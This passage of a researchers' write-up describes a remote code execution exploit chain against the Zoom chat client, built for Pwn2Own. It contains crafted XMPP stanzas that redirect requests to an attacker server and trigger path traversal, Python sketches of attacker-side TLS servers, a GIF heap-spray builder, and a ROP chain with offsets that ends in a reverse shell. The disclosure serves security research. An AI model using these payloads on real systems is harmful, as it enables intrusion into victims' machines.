This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least one of them would already be handled by the LFH, completely breaking our exploit. We weren’t very keen on participating with an exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, lets look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLLs did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a DLL means two things:

  • Any dynamic function call by this library does not check if the target address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG and which calls an address in one of these DLLs is always allowed: the valid start location list is not present for these DLLs, which means that all addresses in the range of that DLL are allowed.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLLs to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then free all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it checks whether there are other, not yet full, buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. A common way would be to allocate something which has a length field, overflow over the length field and then read the object back, leaking whatever follows it. This did not work for us: we did not find any available functionality in Zoom to send something resulting in an allocation of 1025-1088 bytes with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in separate, heap-allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the string is copied to the socket up to the first null byte.

We had found a way to initiate HTTPS requests to a server we control. The method was sending a weird combination of two stanzas Zoom would normally use: one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is appended to a fixed domain to form the URL of an image to download. However, the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:

"https://marketplacecontent.zoom.us" + image
"https://marketplacecontent.zoom.us" + "example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
"https://marketplacecontent.zoom.usexample.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but goes through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak were unlikely to consist entirely of printable characters, we couldn’t get them included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following (a rough sketch of the attacker-side server follows the list):

  1. Initiate an HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.
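
A minimal sketch of the attacker-side server for steps 2, 4 and 5, using only Python’s socket and ssl modules. The certificate files, the port and the delay are placeholders, and whatever certificate the redirected request will accept is outside the scope of this sketch:

import socket
import ssl
import time

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("cert.pem", "key.pem")   # placeholder certificate/key

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 443))
srv.listen(1)

raw, addr = srv.accept()              # step 2: accept the TCP connection...
print("connection from", addr)
time.sleep(30)                        # ...but hold off on the TLS handshake while the
                                      # buffer overflow is triggered (step 3)

tls = ctx.wrap_socket(raw, server_side=True)   # step 4: now let the handshake proceed
request = tls.recv(8192)              # step 5: the request now contains the overwritten
                                      # query, the next heap header and the leaked bytes
print(request)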

This video illustrates how this works:

In essence, this is similar to creating an object, overwriting a length field and reading it back. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object used during a TLS handshake to verify a MAC of the handshake transcript, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
    OPENSSL_free(kctx);
}

This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way of defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but not so many that no deallocated TLS1_PRF_PKEY_CTX objects remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotiation, and even if you want to renegotiate thousands of times without ever sending an HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.
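
As an illustration, a renegotiation-only server can be sketched with pyOpenSSL, which exposes OpenSSL’s renegotiation API directly. This is not the exact server we used; the certificate file names are placeholders, and renegotiation only exists up to TLS 1.2:

import socket
from OpenSSL import SSL

ctx = SSL.Context(SSL.TLSv1_2_METHOD)       # renegotiation does not exist in TLS 1.3
ctx.use_certificate_file("cert.pem")        # placeholder certificate/key
ctx.use_privatekey_file("key.pem")

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 443))
srv.listen(1)

client, _ = srv.accept()
conn = SSL.Connection(ctx, client)
conn.set_accept_state()
conn.do_handshake()                         # initial handshake

while True:
    # Each renegotiation makes the client run another handshake, creating and
    # freeing a fresh TLS1_PRF_PKEY_CTX without any other allocations.
    conn.renegotiate()
    conn.do_handshake()
    print("renegotiations so far:", conn.total_renegotiations())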

The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom; only then would the destructor call some vtable functions.

class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance that we could exit successfully was small. The information leak phase will already have corrupted many objects and heap metadata, which may not matter while those objects are unused, but which could cause a crash due to destructors or frees if we tried to exit.

Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With an emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user-uploaded GIF file instead, we found that we could trigger the download of arbitrarily sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi 1aWl62KifvJ_LDECBM1" size="4322534"/>
  </giphyv2>
</message>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.
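
A sketch of how such a GIF can be built. The minimal GIF bytes are a commonly used 1x1-pixel GIF89a, the 0x20 page offset of GIF_BASE is an assumption derived from the GIF_BASE value (0x462bc020) used in the ROP stack later on, and the payload bytes placed at the 0x6c/0x86/0x7fd offsets are placeholders that would be filled in for real once crypto_base has been leaked:

PAGE_SIZE = 0x1000
TOTAL_SIZE = 25 * 1024 * 1024              # roughly 25 MB per GIF copy
GIF_BASE_OFFSET = 0x20                     # assumption: GIF_BASE (0x462bc020) sits 0x20 into a page

# A commonly used ~35-byte 1x1 pixel GIF89a; enough for the whole file to parse as a GIF.
minimal_gif = bytes.fromhex(
    "474946383961"                 # "GIF89a"
    "01000100800000"               # logical screen descriptor (1x1, global palette)
    "000000ffffff"                 # 2-colour palette
    "2c000000000100010000"         # image descriptor
    "0202440100"                   # minimal LZW image data
    "3b"                           # trailer; everything after this is ignored by decoders
)

page = bytearray(PAGE_SIZE)
page[: len(minimal_gif)] = minimal_gif

def put(offset_from_gif_base: int, data: bytes) -> None:
    off = GIF_BASE_OFFSET + offset_from_gif_base
    page[off : off + len(data)] = data

# Placeholder payload at the offsets the ROP stack below refers to. The fake
# vtable at +0x1c would hold STACK_PIVOT and friends, which depend on the
# leaked crypto_base and are filled in at run time.
put(0x6c, "kernel32.dll\0".encode("utf-16-le"))   # UTF-16 string for GetModuleHandleW
put(0x86, b"VirtualProtect\0")                    # ASCII string for GetProcAddress
put(0x7fd, b"\xcc" * 16)                          # shellcode placeholder

with open("spray.gif", "wb") as f:
    f.write(bytes(page) * (TOTAL_SIZE // PAGE_SIZE))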

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the stack pointer with the address of data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 
ret

This sequence is misaligned and normally does something else, but for us it could be used to copy the address of data we overwrote (held in edi) into the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain starts by calling GetModuleHandleW with the string "kernel32.dll" from our GIF file as its argument. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp
JMP_GETMODULEHANDLEW,
POP_EBX,
KERNEL32_STR,

ADD_ESP_24,
PUSH_EAX_STACK,
0x41414141,
POP_RET, # Not used, padding for other objects
0x41414141,
0x41414141,
0x41414141,
JMP_GETPROCADDRESS,
JMP_EAX,
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
VIRTUALPROTECT_STR,
SHELLCODE,
SHELLCODE & 0xfffff000,
0x1000,
0x40,
SHELLCODE - 8,
]

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned for the info leak, this phase was very tricky. It took a lot of time to get it to the point of having even a tiny chance of succeeding. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.dll in one run and then skip the info leak in the next run (the locations of ASLR randomized DLLs remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.

Conclusion

